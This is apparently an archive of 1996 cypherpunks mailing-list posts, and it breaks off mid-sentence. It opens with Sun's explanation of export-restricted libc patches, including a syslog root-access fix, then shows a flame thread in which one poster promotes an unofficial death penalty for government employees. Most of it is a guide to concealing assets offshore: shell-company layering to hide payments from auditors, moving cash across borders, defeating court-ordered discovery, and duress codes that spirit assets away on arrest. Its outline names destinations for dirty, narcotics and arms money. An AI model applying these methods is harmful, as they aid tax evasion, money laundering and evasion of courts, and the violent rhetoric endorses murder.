        101759-04 - SunOS 4.1.3_U1          Feb 21, 1996 (US only)
        102544-04 - SunOS 4.1.4             Feb 21, 1996 (US only)

        102903-01 - Solaris 2.3             Nov  2, 1995
        101945-36 - Solaris 2.4             Jan 11, 1996
        102905-01 - Solaris 2.4_x86         Nov  2, 1995
        
Notes:

1. The patches shown for 4.1.3 also apply to 4.1.3c.

2. Solaris 2.x (SunOS 5.x) systems are internationalized, so there's no
distinction between "US-only" and "International" versions. To completely close
the syslog family of attacks, you will need to install recent versions of the
jumbo kernel patches (not shown) also.

3. No patches are necessary for SunOS 5.5 (Solaris 2.5) and later. The fixes
made the release.


"US-ONLY" VS. "INTERNATIONAL" VERSIONS OF THE C LIBRARY

In SunOS 4.1.x (the BSD-based Unix), Sun maintained two separate versions of the
C library. The so-called "domestic" version contained DES-based crypto routines,
accessible via a public API. Since we interpreted ITAR to outlaw the exportation
of such a library, we modified our build procedures to produce a less capable
version which we could legally export. All this time, then, we have maintained
two separate sets of patches, one which could legally be exported and one which
could not. (I'm not going to get into details about the technical differences
between the two.)

With the advent of SunOS 5.x, we introduced new methods of handling both libraries
and patches, and this problem went away. That's why there is only one version of the
C library for each version of the OS.

for many years, we called the library version which contain the forbidden-to-export
stuff the "domestic" version, and the other the "international" version. When we
made the latest change (described in the next section), we changed the wording from
"domestic" to "U.S.-only". After all, the word "domestic" applies to every country
from a certain point of view, doesn't it?

The nomenclature is still not quite right. Here is an attempt at a precise statement.
If your SunOS 4.1.x system has the "crypto kit", you can and should use the version
of the C library dubbed "U.S.-only". If your system is not using the "crypto kit"
--whether or not you or it resides in the U.S.--you can and should be running the
"international" version. The crypto kit costs extra, so if you're not sure, you're
probably running the "international" version. Most of our customers are.

The folks at your local Solution Center can probably explain this better than I can.
I encourage you to contact them for more details on this part, or help in determining
which software you are running.


WHAT CHANGED IN FEBRUARY

The change we made in February was to stop the practice of making the "U.S.-only"
version freely available through our world-wide patch database. It is, after all,
"world-wide"; so, after one of our periodic reviews of patch practices the responsible
manager made the policy change. We removed the library code from the latest versions
of the 4.1.x patches, and updated the README files to explain the change.

I don't know for certain whether this was in response to any particular warning
from the U.S. government. I'm assured by the person who made the decision that it
wasn't.

Anyway, the only impact of this change on our customers is that 4.1.x customers who
do have the "crypto kit" installed on their systems now have to go through the Solution
Centers to get C library patches. (I guess a second impact is that folks who aren't
licensed to have the crypto kit can't get the "U.S.-only" library version--but
they're not entitled to have it, and in theory couldn't make use of it anyway.)

I can understand why the original poster found this difficult to figure out by
him- (or her-) self, I guess. Anyway, the README file does say, right near the top,

        Please contact your Sun Solution Center or other SunSoft
        authorized service provider (ASP) in the U.S. to obtain a
        copy of the actual patch.
        
... and that's what several of our affected customers have done, since.

We certainly apologize for any confusion.

-mg-

Mark Graff
Sun Security Coordinator
mark.graff@sun.com
security-alert@sun.com

p.s. I'll include this explanation in my next Sun Security Bulletin. (If you want
a free subscription, BTW, just send a message to security-alert@sun.com with the
subject "SUBSCRIBE CWS your-mail-address".

p.p.s (If anyone wants to discuss this further with me, please pursue it
privately. I didn't pop my head up over the parapet to get drawn into a big
public ITAR debate.)



 From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
 To: cypherpunks@toad.com
 Subject: Sun patch pulled (was Re: HP & Export of DCE)
 Date: Wed, 27 Mar 1996 23:16:56 GMT
 
 I noticed that Sun's latest libc patch (101759-04) is empty.  Previous
 versions contained the complete U.S. version of libc, including the
 tres-dangerous DES and crypt functions.  In the current rev only the
 README remains, presumably because:
         EXPORT INFORMATION: This patch includes code which performs
         cryptographic functions, which are subject to U.S. export
         control, and must not be exported outside the U.S. without
         prior approval of the U.S. government.  Prior export approval
         must be obtained by the user of this patch.
 
 So, you might ask, what fixes is Sun not distributing???
     (Rev 04)
         1190985 gethostbyname() can trash an existing open file descriptor.
         1182835 portmapper silently fails with version mismatch by PC-NFS
                 client
         1219835 Syslog(3) can be abused to gain root access on 4.X systems.
 
 Yup, that's right.  The syslog hole that was so well publicized by
 CERT will remain open indefinitely because the ITAR makes it illegal
 for Sun to distribute the fix!
 
 So did HP and Sun spontaneously, simultaneously develop crypto awareness,
 or is some gummint dweeb whispering threats in their ear?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 20:38:40 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u2lXz-0008yYC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960329165520.15388D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, jim bell wrote:

> At 05:32 AM 3/29/96 -0500, Black Unicorn wrote:
> >On Thu, 28 Mar 1996, jim bell wrote:
> >
> >> At 03:46 PM 3/28/96 -0500, Black Unicorn wrote:
> 
> >You clearly don't understand.  You are an ass making an assumption that a 
> >court cares or believes that the witness can actually produce the 
> >requested information or not.  Fines tend to be imposed regardless.
> 
> Bullets don't care that a judge was justified in his decisions, either.  

God I hope you keep talking like this.  The list might not have to endure 
you anymore unless you get a cushy prison cell with internet hookups.

> Ultimately, your repeated argument is simply, "The legal system can be 
> abused by those who work in it."

I wouldn't call fines imposed on a third party who clearly was complicit 
in the destruction of material evidence to a proceeding "abuse."

It's abuse because you can't get away with your little scheme?  Eh?

Mr. Bell can't commit his crime with impunity, so the justice system is a 
sham?

  I don't challenge this claim, in fact my 
> position depends on its truth; my assertion  is that the current legal situation is 
> out of the control of people faithful to the meaning of the Constitution, 
> and has been so for a long time.  One of the main reasons I promote a 
> de-facto (and unofficial) death penalty for recalcitrant politicians and 
> other government employees is because the traditional "checks and balances" 
> system seems to no longer be working for the interests of the average citizen.

Yadda yadda yadda.

> 
> >> And in any case, I consider it highly doubtful that anybody would contract 
> >> with an escrow agent and identify himself by name
> >
> >The same way no one creates Panamanian companies with their own name.  So 
> >what?  Third parties are still fined heavily.
> 
> Any specific examples?

Sure, several.  See my large note on the subject of asset protection.

  No?  I thought so!  In any case, if "third parties" 
> are "fined heavily," that is even more justification for setting up a method 
> to deter out-of-control courts.

Mr. Bell, go make yourself a sovereign or something.

> >>It would be a simple 
> >> matter to operate "escrow agents," just glorified data-holders, who would 
> >> receive data anonymously and send it out just as anonymously, to the person 
> >> who can identify themselves via some sort of encrypted ID system.
> >
> >And simpler for courts to fine them out of existance (which happened to 
> >several banks, trust companies and agents in Cayman and Panama.
> 
> I guess you really don't realize that every claim you make demolishes the 
> justification for your obvious hostility to a system which prevents exactly 
> the kind of abuses you list.  (Although it really isn't clear whether you 
> would classify them as "abuses.")

My hostility is for a system that allows mob mentality and murder run the 
streets like a bad day in Beruit.

Again, I don't consider fines assessed to deal with obviously complicit 
third parties to be abuse.  Your problem is you can't deal with 
authority without calling for murder.  Become an expatriate if you don't 
like the U.S.  Move to e.g., East Turkey.

> >They need only suspect or have reason to suspect it might be exculpatory.
> _                                                             ^^^^^^^^^^^
> Sloppy word usage.  I think you meant, "incriminating."  Typical for you.

Actually I should have said "material."

> >Practically speaking this means convincing a judge.  Not hard when the 
> >words "offshore holding company" are mentioned in a brief or hearing.
> >
> >> In short, you need to comprehend what you're responding to before you 
> >> express your opinions.  You're living down to my expectations.
> >
> >In short, go to law school, then try to talk about legal issues.
> 
> In this day and in this country, "going to law school" is basically 
> synonymous with "learn to get along with the current legal system."  It 
> should have been obvious long ago that I don't consider the current legal 
> system to be worth living with.

Suicide is always an option.

I don't much like the system in the United States either.  But there are 
two ways around it.  Ways that work, and ways that don't.

Encouraging random murder and mob justice is, in my view, in the second 
field.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 17:05:58 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Note: Problems Confronting the Asset Concealer [Part 1 of 2 of Volume I]
Message-ID: <Pine.SUN.3.91.960329170907.15388E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Prologue:

C'Punks:

While direct crypto relevance is limited, I thought that this work 
might interest many on the list and so I decided to post it in any 
event.  The sections on fourth and fifth amendment protections, or 
lack thereof, for banking documents might shed some light on the 
eventual disposition of crypto keys under the same circumstances.

This text represents a sanitized and >heavily< modified version of 
scholarly work I recently published.  I should also mention that 
portions of the original work have been subjected to official review 
prior to publication.  For the purposes of posting to the list, and to 
conceal my identity, I changed the note to approach things from the 
perspective of the asset concealer.  Although this wouldn't have gone 
over well when submitted for a scholarly publication, it better 
represents the way I think about these issues.  Given the nature of 
the "legitimate" scholarly work that predates it and its subject 
matter, this note seemed the logical extension, and I found myself a 
bit carried away with it before I was done.  In this regard the below 
is a more honest and complete picture of asset protection than the 
scholarly work, or probably than any other publication floating about 
right now.

And it's just for you cypherpunks, for the moment.

Unfortunately, after completing the work I began to realize that many 
sections were inappropriate for general release.  As a result several 
source cites that survived review have been removed, but I have tried, 
where able, to keep the majority of the substantive material present.  
When I felt the need to remove substantive portions it was either to 
prevent exposing what I believe to be novel methods, because I 
consider the sections work product which I would like to continue 
utilizing effectively, or to protect those methods I know to be 
utilized by my associates.  To prevent misunderstandings, where large 
portions (more than a few lines) or crucial elements have been 
removed, I have so indicated with empty brackets. ("[]" and "[...]").

I've segmented the note.  I'll consider posting the second, third and 
forth volumes if there's enough interest.  As they involve some of the 
more sensitive issues, I'm not sure yet if I'm willing to release them 
generally, with more deletions, or at all.

If it gets to you garbled, mail me, I'll send you another copy.

As always, this is an educational/academic work.  The law is ever-
changing and attempting to conduct international financial 
transactions without exacting professional advice is ill advised and 
extremely dangerous.  I'm not being paid for services, so the reader 
uses this material at his or her own peril.

I reserve all rights to this work.  Please do not re-distribute it 
without permission.  I intend to allow its semi-free circulation 
generally, but I must ask that forwarders request permission before 
reproducing it so that I may have an idea of where it is going.  This 
is mostly for my personal edification.  >Please do not< make it 
available via WWW, FTP, or other unrestricted distribution.  If you 
insist on ignoring my wishes, may a thousand biting flies infest your 
pubic hair, but at least leave my e-mail address on it.

**********

[...]

Practical and Legal Problems Confronting the Asset Concealer in 
Relation to Offshore Financial and Corporate Entities:  A View from 
the Perspective of the Individual Attempting to Avoid Extraterritorial 
Discovery, Attachment, or Coercion.

[] (unicorn@schloss.li)*

* LL.M.,[]; M.A.,[]; J.D.,[]; B.A.,[];.  [] is an attorney licensed to 
practice in The District of Columbia, Switzerland, [], and also a 
former member of the intelligence community.

'''''

I.  Introduction
II.  Use of the Offshore Haven
     []
     What to Look for in an Offshore Haven
     []
III. Legal Considerations for the Asset Concealer
     U.S. Discovery
       Compelled Consent Orders
       Local Illegality
     Foreign Offshore Jurisdictions Respond
       Discovery Blocking
       Judgment Blocking
     Are High Profile Offshore Centers to be Avoided?
     []
     The Goals of the Asset Concealer and Selection of Jurisdiction
       Tax Cases
       Securities Issues
       []
     The Constitution is of No Help.
       The Fourth Amendment
       The Fifth Amendment
IV.  Esoteric Considerations
     Intelligence Threats
     The Anatomy of a Money Laundering Investigation
     []
     Private Banks
     Using Private Banks to your Advantage
     []
     Bearer Shares
V.   Reviews of Specific Jurisdictions
     Why I Don't Like Switzerland Anymore
       The SBA
       Mutual Legal Assistance Treaties
     Why I Like Panama
     Why I Like Liechtenstein
       The Anstalt/The Treuunternehmen
       The Stifung/The Aktiengesellschaft
       Secrecy
     Why I Like (sort of) The Cayman Islands
       Private Banks
       []
     Why I Like Vanuatu
       Bearer Shares
       []
       Private Banks  (Easy?)
       []
     Why I Like Turks and Caicos
       Redomiciling
       Private Banks  (The Easiest?)
       []
     Why I Like Bermuda
     Why I Like (in a pinch) The Bahamas
       The Bahamas Corporation
       Private Banks
       The Local Authorities
     Why I Like Nauru
       Holding Corporations
       Private Banks
     Why I Like (sort of) The Virgin Islands
       Security Through Obscurity
       The Thatcher Appeal to Reagan
     Why I Like (in a pinch) Aruba
     Why Moving Money is Easy in Latvia
     Why Moving Money is Easier in Thailand
     Why Moving Money is Easiest in Estonia
       Arms Dealing and the Velocity of Money
       []
       Liquidity and Ease of Exchange
       The Local Authorities
     Why I Send Casual Arms Dealers to Liberia
       []
     Why I Send those with $10m+ to Seychelles
       Diplomatic Immunity
       []
       Investment Incentives
       Reliability
     Why I Send Those with $15m+ to Monaco
       Conversion to Bearer Shares
       Shipping Investments
     Why I Send Dirty Money to Rumania
     Why I Send the Filthiest Clients to Bulgaria
       Fraud in the Bright of Day.
       The Local Authorities: A Case Study
       []
     Why I Send Narcotics Money to Turkey
     Why I See Promise in Gibraltar
VI.  Conclusions
     Constructing Asset Concealing Organizations: Step by Step
       Forming the Holding Entity
       Forming the Direct Asset Holders
       []
       Bearer Shares: Double Blinds
       Forming and Using Your Personal Financial Institution
       Moving the Money:  Avoiding Currency Reporting
       []
       The Re-investment Vehicle
       Warning Signs
       Pressing the Panic Button
       The Tools of the Trade and How to Use Them
       A Case Study I
       A Case Study II
       []
       A Case Study IV
     The Future of International Asset Protection
     The Key to Success in Any Jurisdiction
     Secrecy or Expatriation?
     Final Thoughts
VII. Appendix
     Detailed Analysis: Personal Financial Institution Formation in:
       The Cayman Islands
       Panama
       Luxembourg
       Jersey
       Bahrain
       []
       Vanuatu
       The Bahamas
       []
     []
     Contacts:
       Professionals I Recommend to Asset Concealers
       []
       Financial and Trust Institutions of Note
       []

'''''

I.  Introduction

While there has been much writing on "tax shelters," money laundering, 
and the use of the international business corporation to "judgment 
proof" assets, I've seen little discussion of the practical 
considerations in shielding assets effectively, especially for the 
United States resident.  With all the seminars, and "insider's guides" 
to the various jurisdictions and their incentives, there exists a 
significant amount of disinformation floating about.  I thought I 
would take the time to dispel some of the rumors and myths about asset 
protection and try to give a practical view that is sorely lacking in 
any of the common or scholarly literature on the subject.  The 
following work will examine these issues in more detail.  Part II will 
examine very briefly the uses of the offshore "tax haven."  Part III 
will consider some of the legal aspects confronting the asset 
concealer.  Part IV will examine some of the more esoteric issues and 
attacks on the asset concealer. Part V will take a closer look at some 
jurisdictions.  Part VI will draw some conclusions, provide a step by 
step guide for constructing asset concealing organizations and make 
some predictions for the future.

II.  Use of the Offshore Haven

Most people assume that the amount of the underground economy is 
fairly small and that offshore banking is entirely too complicated for 
the everyday person to deal with.  This is patently false.

Even as early as 1979 estimates of illegal money flowing through the 
Caribbean tax havens alone was in excess of fifty billion dollars a 
year.  The Use of Offshore Tax Havens for the Purpose of Evading 
Income Taxes: Hearings Before the Subcommittee on Oversight of the 
House Committee on Ways and Means, 96th Cong., 1st Sess. 1 (1979).  
One estimate at the time attributed $25 billion a year to the Bahamas 
alone.  Illegal Narcotics Profits: Hearings Before the Permanent 
Subcommittee on Investigations of the Senate Committee on Governmental 
Affairs, 96th Cong., 1st Sess. 474 (1979) (Exhibit No. 33, Offshore 
Banking: Issues With Respect to Criminal Use, Submitted to the Ford 
Foundation, Nov. 1979, by Richard Blum and John Kaplan).  In 1978, the 
Bahamas held $95.2 billion in foreign assets, a mere $1.8 billion of 
which was used to finance foreign trade.  Douglas J. Workman, The Use 
of Offshore Tax Havens for the Purpose of Criminally Evading Income 
Taxes.  Today the Cayman Islands have a population of 30,000, over 500 
banks and some $415 billion of assets on deposit.

All one must do to take advantage of an offshore tax haven is get the 
money offshore and design a vehicle to use it where you live.  The 
techniques used to accomplish these goals are as varied as the 
creativity of the asset concealer.  Even so, and while any treatment 
of this subject must almost by definition be incomplete, some of the 
more apparent aspects and methods are touched on below:

A) Moving money offshore:

Obviously, a cash producing business could easily stream funds 
overseas without much auditing liability.  Follow this simple 
procedure:
1. Put cash in pocket.
2. Get on plane to offshore jurisdiction.
3. Deposit cash.
4. Return.

Or in the case of non-cash businesses:

American Business ("Biz") is owned by U.S. Citizens 1-3.  Business 
"expenses" for Biz are paid to a foreign corporation ("For1"), and 
deducted from Biz's corporate taxes.  While an audit might disclose 
these payments to the foreign corporation, it is fairly easy to shield 
them within the cost of goods sold.  If pressed, it is easy for Biz to 
claim that For1 and Biz are unrelated, and produce canceled checks 
and/or receipts to effect such proof.  For1 retains 10% of the 
payments from Biz, and passes the remainder to another foreign 
corporation ("For2").  An auditor will now have no direct access to 
records of the payments from For1 to For2, and indeed, the records may 
not even be in the country.

Biz could also claim to be paying for services rendered under contract 
by For1, where in actuality said services are being performed by Biz 
and claimed by Biz as business expense deductions.

[...]

B)  Bringing the money back.

Assume For2 is owned by a foreign offshore trust ("Trust") the 
beneficiaries of which are citizens 1-3.  Any investigation would be 
tasked to reveal the existence of this relationship or the flow of 
funds back to the citizens.  While for technical purposes these funds 
are held offshore, their presence in a U.S. bank in the name of Trust 
is certainly possible.

Wiser still, For2 could direct Trust to make a third foreign 
corporation ("For3") the 100% beneficiary, invest in U.S. securities 
through For3 (the capital gains of which are not technically taxable 
to foreign entities not connected to the United States).  Repatriating 
the assets is a simple matter accomplished either by situating For3 in 
a jurisdiction with a treaty waiving the withholding tax on dividends 
and interest (in past this has been the Netherland Antilles) or by 
drawing directly on the foreign accounts of For3 in such a way so as 
not to draw undue attention.

In past if Citizen 2 had some appreciated securities he would have 
sold them to Trust in return for an annuity with a carryover basis, or 
as an installment sale.  Citizen 2 would recognize only the annuity 
gain on the transaction because the gain will be realized by the 
offshore entity.  Obviously, the capital gain can be repatriated in 
the same way as above.

Citizen 3 lives and spends a great deal of money in the United States, 
but is already the subject of several large judgments in the country.  
She instructs Trust to lease a new Ferrari, and obtain a secured Gold 
Mastercard in the trust's name from the bank administering Trust.  
Citizen 3 can enjoy the fast life, draw massive cash advances as well 
as purchase anything she likes without income accountability.

Various complications can be included in any liberation/repatriation 
plan.

Tainted funds can be exchanged for large denomination bank notes in 
varied currencies, the notes exchanged for bank checks, bearer credit, 
or bearer bonds/certificates of deposit, or any liquid monetary 
instrument easy to travel with. (Uncut diamonds, precious metals or 
securities are all quite popular).  The goods are then transferred 
into another country and liquidated or stored.

[...]

While many of the legal loopholes have been filled with regard to the 
more public transactions, it becomes increasingly clear that asset 
concealing is an informational issue.  The more difficult one makes it 
for investigators to discover assets, trace their movement, or to 
attribute any of these things to the depositor, the more effective the 
asset concealing endeavor will be.  Asset concealing thus becomes a 
question of economics.  How much can the prosecuting authorities 
spend, how much time do they have, and is there any degree of 
suspicion to begin with?

     What to Look for in an Offshore Haven

[...]

III.  Legal Considerations for the Asset Concealer

     U.S. Discovery

       Compelled Consent Orders

Many people believe that foreign and domestic banks, particularly 
those situated in jurisdictions that criminalize such disclosure, will 
never release depositor's account information, assets, or related 
documents.

This too is patently false.  In fact, the United States has gone to 
lengths to make it difficult for foreign banks and fiduciaries to 
withhold such items from U.S. litigants.  Typically, heavy fines are 
imposed on banks refusing to comply with court orders compelling 
discovery of financial documents, even those located in foreign 
jurisdictions and where the disclosure imposes criminal and civil 
penalties on the disclosing bank.  Fines of $2 million are not without 
precedent.  (Unites States v. Bank of Nova Scotia, 740  F.2d 817, 832 
(11th Cir. 1984), cert. denied, 469 U.S. 1106 (1985)(upholding 
$25,000/day fine totaling $1,750,000 for failing produce documents 
located in the Cayman Islands under grand jury subpoena duces tecum; 
Marc Rich & Co., A.G. v. United States, 707 F.2d 663, 670 (2d Cir.), 
cert. denied, 463 U.S. 1215 (1983)($50,000/day against Swiss 
corporation for noncompliance with subpoena duces tecum demanding 
documents located in Switzerland).  It should be very apparent that 
U.S. courts are not shy about imposing potent sanctions, even upon 
third parties, in order to facilitate plaintiffs and prosecutors 
access to documents and evidence.

On international discovery, See Generally, Note: Ordering Production 
of Documents from Abroad in Violation of Foreign Law, 31 U. Chi. L. 
Rev. 791 (1964); Note: Recent Developments in the Law Concerning the 
Foreign Illegality Excuse for Non-Production, 14 Va. J. Int'l L. 747 
(1974); Note: Foreign Nondisclosure Laws and Domestic Discovery Orders 
in Antitrust Litigation, 88 Yale L.J. 612 (1979); Limitations on 
Concurrent Jurisdiction -- U.S. Court May Order Discovery of Foreign 
Documents, Notwithstanding Foreign Law, If Discovery Will Support 
National Policy, Is Vital to the Litigation, and May Be Accommodated 
by the Foreign Sovereign, 20 Va. J. Int'l L. 925 (1980); Rosdeitcher, 
Foreign Blocking Statutes and U.S. Discovery: A Conflict of National 
Policies, 16 N.Y.U. J. Int'l L. & Pol. 1061 (1984); Robinson, 
Compelling Discovery and Evidence in International Litigation, 18 
Int'l Law. 533 (1984).

       Local Illegality

This puts many banks in dire straits as local jurisdictions can in 
turn impose powerful sanctions for complying with court ordered 
discovery in the United States.  See e.g., Bank and Trust Company 
Regulation Act of 1965, @ 10(3) (amended 1980)(Bahama Islands)(fine up 
to $ 15,000, prison term up to two years, or both); Art. 47, Bank G. 
(Switzerland)(fine up to $ 50,000 or prison term up to two years, fine 
to $ 30,000 for negligence); Montserrat Ordinance, No. 5 Section 5 
(1980)(The Confidential Information Ordinance)(fine up to $ 5,000 and 
prison term up to two years for "nonprofessional person," fine up to $ 
10,000 and prison term to four years for "professional person"); The 
Bank Secrecy Act, Art. 2 (Greece)(minimum of six months imprisonment 
with no possibility of suspended sentence, or imposition of fine).

>From the perspective of the asset concealer it is worth noting that it 
is not only banks that can be fined for failure to disclose financial 
information.  Accountants, clerks, corporations, or literally any 
fiduciary, are subject to significant fines and incarceration in the 
United States for failing to comply with court ordered discovery.  
Many of these "secondary" participants are targeted and, as often they 
have shallower pockets, are less able to bear the legal costs of 
defending against these powerful fines and, unlike banks, have less to 
lose in the way of reputation and client goodwill if they comply and 
disclose.  Given the lower fines and the infrequency with which 
criminal penalties are imposed on professionals so compelled, it is 
often to the advantage of the foreign document or evidence holder to 
disclose and risk the ire of local authorities rather than the 
notoriously vigorous U.S. courts.  Some U.S. courts have gone so far 
to indicate that banks unwilling to submit to the will of one or the 
other sovereign should "cease operation of the foreign branch."  See 
e.g., First Nat'l City Bank v. IRS, 271 F.2d 616 (2d Cir. 1959); 
United States v. First Nat'l City Bank, 396 F.2d 897 (2d Cir. 1968).  
At least one court has not only acknowledged this dilemma, but wielded 
it as a policy measure, "...the defendant should feel the full measure 
of each sovereign's conflicting commands and so choose between laws of 
those two sovereigns."  Westinghouse Elec. Corp. v. Rio Algom, Ltd., 
480 F. Supp. 1138 (N.D. Ill. 1979).

Generally speaking, there is little guidance for federal district 
courts, in which most of the litigation arises, as the only solid 
Supreme Court authority is Societe Internationale pour Participations 
Industrielles et Commerciales, 357 U.S. 197 (1958).  Courts, while a 
bit shifting in their doctrine, have tended to apply a few common 
considerations.  Factors indicating the United States interests at 
stake and the foreign entity's good faith attempts to comply with the 
court's order will both, almost without exception, be considered in 
reviewing the need for sanctions against foreign entities.  See 
Generally, Mark Brodeur, Note: Court Ordered Violations of Foreign 
Bank Secrecy and Blocking Laws: Solving the Extraterritorial Dilemma, 
1988 U. Ill. L. Rev. 563.  What is concerning for the asset concealer 
is the meaning of the latter.  Good faith attempts to comply with a 
U.S. court order do not typically include refusal, however apologetic, 
on the grounds of local illegality or violation of general privacy 
considerations of the fiduciary's client.  In practice the balance 
between U.S. interests rarely, if ever, weighs in favor of the party 
resisting disclosure.  United States v. Davis, 767 F.2d 1025 (2d Cir. 
1985); Bank of Nova Scotia I, 691 F.2d 1256 (11th Cir. 1982); Bank of 
Nova Scotia II, 740 F.2d 817 (11th Cir. 1984); United States v. Vetco 
Inc., 644 F.2d 1324 (9th Cir. 1981); State of Ohio v. Arthur Andersen 
& Co., 570 F.2d 1370 (10th Cir. 1978); United States v. Field, 532 
F.2d 404 (5th Cir. 1976); Garpeg Ltd. v. United States, 583 F. Supp. 
789 (S.D.N.Y. 1984); Compagnie Francaise D'Assurance pour le Exterieur 
v. Phillips Petroleum Co., 105 F.R.D. 16 (S.D.N.Y. 1984); Banca Della 
Svizzera Italiana, 92 F.R.D. 111 (S.D.N.Y. 1981)(All resulting in 
findings of bad faith on the part of the custodial agent).

       Foreign Offshore Jurisdictions Respond

Many foreign states have sought to eliminate the dilemma by enacting 
laws ("blocking statutes") re-enforcing banking secrecy.  Blocking 
legislation usually takes two forms.  Judgment blocking, which 
indicates that the enacting nation will simply not recognize certain 
foreign judgments, and discovery blocking, which prohibit disclosures 
for certain discovery requests.

It is interesting to note that much of the disagreement surrounding 
the efficacy of judicially compelled extraterritorial disclosure seems 
to revolve around a basic difference in approach for foreign states 
and U.S. Courts.  Mr. Brodeur, notes that foreign states usually find 
themselves concerned with the applicability of U.S. jurisdiction in 
their state and questions of sovereignty, where U.S. courts tend to 
feel that the "pertinent legal conflict" revolves around the general 
legitimacy of the compulsory disclosure orders themselves.  While the 
perspective of the United States is understandable, foreign states 
have a point.  Rare indeed is the U.S. court that bothers to assert 
jurisdiction based on the 'required' finding for extraterritorial 
extension of jurisdiction that the foreign entities activities have 
sufficient "effects" within its borders.  Brodeur notes further that 
there is little precedent in international law for compelled discovery 
orders and that many states protest such orders consistently.  See, 
International Law Association, Report of the Fifty-First Conference 
407 (1964), documenting the protests of, e.g., Denmark, the United 
Kingdom, France, the Federal Republic of Germany, Italy, Japan, 
Norway, Sweden, Belgium, Greece, and the Netherlands.  Most foreign 
states view their active resistance to U.S. policy as a preservation 
of their own sovereignty and policy.  See, Rosenthal & Yale-Loehr, 16 
N.Y.U. J. Int'l L. & Pol. 1075, 1080 (1984); Comment: Foreign Blocking 
Legislation: Recent Roadblocks to Effective Enforcement of American 
Antitrust Law, ARIZ. ST. L.J. 945 (1981).

Given the above, the asset concealer will want to select an entity 
located in a jurisdiction with strict banking secrecy law and, 
ideally, one which has enacted legislation blocking compelled 
discovery.  Such legislation will give the investor an idea of the 
local policy and posture vis-a-vis the United States and compelled 
discovery generally.  Lists of such jurisdictions are somewhat 
difficult to come by but the generally accepted (if dated) authority 
on the subject is E. Chambost, Bank Accounts -- A World Guide to 
Confidentiality 93-259 (1983).  Chambost lists comprehensive 
treatments of 44 countries that provided banking secrecy in 1983.  
More recent publications include Grundy's Tax Havens, Tolley's Tax 
havens, and the superior Practical International Tax Planning by 
Marshall Langer.  This publication is updated quarterly and if a 
comparable alternative exists publicly, I am unaware of its existence.

Among the more robust of the listed countries are Great Britain, South 
Africa, Australia, Germany, France, Italy, Denmark, Japan, Portugal, 
Sweden, Belgium, Spain, Finland, Mexico, Norway, the Netherlands, 
Andorra, Bahrain, Hong Kong, the British Virgin Islands, Guernsey, 
Luxembourg, Isle of Man, Russia, the Bahamas, the Cayman Islands, 
Hungary, Liechtenstein, Vanuatu, Panama, Singapore, Switzerland, 
Lebanon, Malaysia, Nauru, Austria, Costa Rica, Klienwalsertal, 
Jungholz, St. Vincent, the Turks and Caicos Islands.

The surest and longest standing banking secrecy jurisdictions have 
historically been Austria, The Cayman Islands, The Bahamas, 
Switzerland, Costa Rica, El Salvador, Liechtenstein, and Panama.  
Unfortunately, with the growing EC/EU membership, Austria and 
Switzerland have begun to lean away from their strict banking secrecy 
and I personally find these jurisdictions to be a bit risky, 
especially given Switzerland's recent legislation and adoption of the 
latest round of banking reform treaties with the United States, which 
I will treat later.  While the treaty is not in full release as of 
this writing I am able to disclose that it deals, among other things, 
in detail with Banking Secrecy compromises.

Jurisdictions in which I found significant discovery blocking statutes 
include: The United Kingdom, Australia, Belgium, Denmark, Finland, 
France, Germany, Italy, the Netherlands, New Zealand, Norway, the 
Philippines, South Africa, Sweden, and Switzerland.

Jurisdictions with judgment blocking which I consider sufficient 
include the United Kingdom, Australia, Belgium, Canada, the 
Netherlands, the Philippines, and South Africa.  The most powerful 
blocking statutes, (as in the United Kingdom) provide for the private 
recovery against the disclosing party of funds lost as a result of 
violation of the statute.  The cautious asset concealer will seek such 
a jurisdiction.  It is wise to keep in mind, however, that many 
jurisdictions do not have explicit blocking statutes on the books and 
yet are as secretive, or indeed, more secretive than those which do.  
Vanuatu is a good example of such a jurisdiction.

Still other jurisdictions find their basis for banking secrecy in 
common law.  Hong Kong: based on, Tournier v. National Provincial & 
Union Bank of England, 1 K.B. 461 (C.A. 1924); Anguilla, Antigua, 
Barbados, Bermuda, Montserrat, St. Vincent, the Turks and Caicos 
Islands, (Fedders, Waiver by Conduct -- A Possible Response to the 
Internationalization of the Securities Markets, 6 J. Comp. Bus. & Cap. 
Market L. 1, 30 (1984) are among these.

The dedicated asset concealer will take note that discovery and 
judgment blocking statutes, unlike banking secrecy laws, are not 
waivable by banking customers.  If placed in custody by local 
authorities to effect compliance, the depositor will be unable to 
effect his or her own release by instructing the foreign institution 
to surrender the requested documents or information.  Almost all such 
blocking statutes require express governmental authority for 
disclosure.  The hard core concealer will recognize, however, that 
many judges will be more sympathetic to the defendant who is unable to 
comply, even in good faith, and may refuse to impose incarceration for 
contempt as a result.  While a factor, relying on the good graces of 
the judge overseeing a proceeding involving the magnitude of assets 
likely to be present is probably ill advised.  Some jurisdictions 
refuse to acknowledge the instructions of asset holders held against 
their will.  Others will refuse to acknowledge judicially compelled 
consent orders.  (The Cayman Islands).  Still others will refuse to 
release documents or funds unless the asset holder or fiduciary signs 
a form personally in the offshore jurisdiction (which does not have 
extradition treaties).

An array of anti-duress, coercion and compulsion provisions are 
available from the more creative fiduciaries.  For example, duress 
code words triggering the transfer of assets to a separate random 
jurisdiction at the trustee's discretion, or into the care of a 
unnamed third trustee.  In the latter instance, the first trustee can 
plausibly deny any knowledge of the assets disposition.  One 
arrangement I am fond of is illustrative of the range of options 
available to the innovative designer.  Client A expects difficulties 
with local law enforcement.  If Client A's attorney learns of his 
arrest or detention, he is instructed to call the trustee managing A's 
assets.  The trustee, when notified, would collect the documents from 
his office, walk across the street and deposit the documents in a drop 
box at a neighboring trust company.  The trustee would then phone the 
